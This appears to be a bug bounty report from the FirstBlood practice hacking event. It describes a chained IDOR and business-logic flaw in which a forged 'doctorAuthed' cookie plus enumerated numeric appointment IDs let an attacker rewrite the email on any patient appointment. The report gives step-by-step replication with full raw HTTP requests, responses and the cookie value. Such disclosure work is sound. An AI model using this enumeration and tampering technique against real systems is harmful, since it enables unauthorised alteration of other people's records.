FirstBlood-#228Docauth cookie used to amend email - Additionally chained with Rpt 127 and 129 - This is the full report.



On 2021-05-13, jpdev reported:

Summary

When supplying a specific base64 encoded cookie on amending an appointment and supplying the e-mail parameter within the header content with a new value the submission is successful. This results in the original e-mail address being replaced with the new value.

Additionally

This can be chained with bug report ID 127 and 129

Replication steps

Retrieve cookie

Navigate to the: http://firstbloodhackers.com:49650/register.php webpage

Enter in any username and invite code - it does not need to be valid.

The server returns the following response and sets the cookie to the cookie jar within the browser

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 17:56:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9; expires=Thu, 13-May-2021 18:56:48 GMT; Max-Age=3600; path=/
Content-Length: 11014

The key part of this response is the cookie.

doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

The appointment

  1. At this stage you now need to create an appointment, save the request in burp repeater and make note of the GUID. Label the request New.
  2. Once you have the GUID navigate the UI and manage your appointment. Capturing the request in burp search for your appointment using the GUID. Send this to repeater and label this Search.
  3. Amend the appointment and save the request. Label this Amend.
  4. Now cancel your appointment and save the request in repeater. Label this Cancel.

Hunting valid appointment ids

This is a cleaner version of ReportID: 129

From step 2 of the appointment stage, you should see the param aptid within the request.

GET /manageappointment.php?success&aptid=bbc826ec-a9a3-4697-b8fa-4a623033e21f

Using the aptid parameter, you can use this in place of the id parameter on a POST request on the /api/ma.php endpoint, this is used when editing the comments or cancelling a valid appointment. This is our request labelled Cancel in the repeater from the appointment stage, step 4.

Performing the below request to cancel the appointment but using the aptid param and iterating a numerical id on this param will return any valid appointment ids with a success response. For this request you will need the act param set to cancel, however, note it does not cancel the appointment.

Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49335
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 25
Origin: http://firstbloodhackers.com:49335
DNT: 1
Connection: close
Referer: http://firstbloodhackers.com:49335/manageappointment.php?success&aptid=81435813-e40a-411d-af19-6e2d89963493
Cookie: drps=62f02a3467fff377e02116e10

act=cancel&aptid=56911904
Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 May 2021 18:05:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 7

success

Changing the e-mail with the numerical id

From Step 1 of our appointment stage, the submission of a new appoint you will see there are a number of parameters these are, in no particular order:

fname, lname, address, city, phonenumber, dob, email, a1, a2, a3, slot

The one parameter we are intrested in here is the email.

So now you have your cookie, you have a list of valid id's and now your email param you can now use these in copy of the request labelled amend in the repeater, step 3 from our appointment stage.

Replace the message (report: 127), add the email param with a value and replace the GUID with one of the found numerical ids. Make sure your cookie is in place. Once the request is crafted and submitted you will get a success message, The e-mail has been changed on hte appointment.

Request to amend the e-mail with Numerical id.

POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49650
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 51
Origin: http://firstbloodhackers.com:49650
Connection: close
Referer: http://firstbloodhackers.com:49650/manageappointment.php?success&aptid=bbc826ec-a9a3-4697-b8fa-4a623033e21f
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

message=changed1&[email protected]&id=56911356

Additional attack vector

Finally the same can be achieved with the original GUID but much more difficult to iterate these!

Request
POST /api/ma.php HTTP/1.1
Host: firstbloodhackers.com:49650
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-SITE-REQ: permitted
csrf: 99215d4e-0ff3-4275
Content-Length: 205
Origin: http://firstbloodhackers.com:49650
Connection: close
Referer: http://firstbloodhackers.com:49650/manageappointment.php?success&aptid=bbc826ec-a9a3-4697-b8fa-4a623033e21f
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9

message=changed1&[email protected]&id=bbc826ec-a9a3-4697-b8fa-4a623033e21f

Impact

This breaks the CIA triangle , Integrity of the data is not assured as we have changed it. The attacker can do this en-mass changing the e-mail address of each appointment that is found to be valid.

P2 High

This bug makes use of the following vulnerabilities in a chain:

  • IDOR
  • Application/Business Logic


FirstBlood ID: 6
Vulnerability Type: IDOR

The endpoint MA.php (to modify an appointment) will allow for integer values to be used when modifying appointments. A bad cause of security through obscurity was attempted.

FirstBlood ID: 7
Vulnerability Type: Application/Business Logic

The endpoint MA.php (to modify an appointment) only allows for certain values to be modified, however due to some application logic error, if the user has tried to signup as a doctor and has the cookie "doctorAuthed" set, then it allows them to modify the email address for any appointment.


Respect Earnt: 1500000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.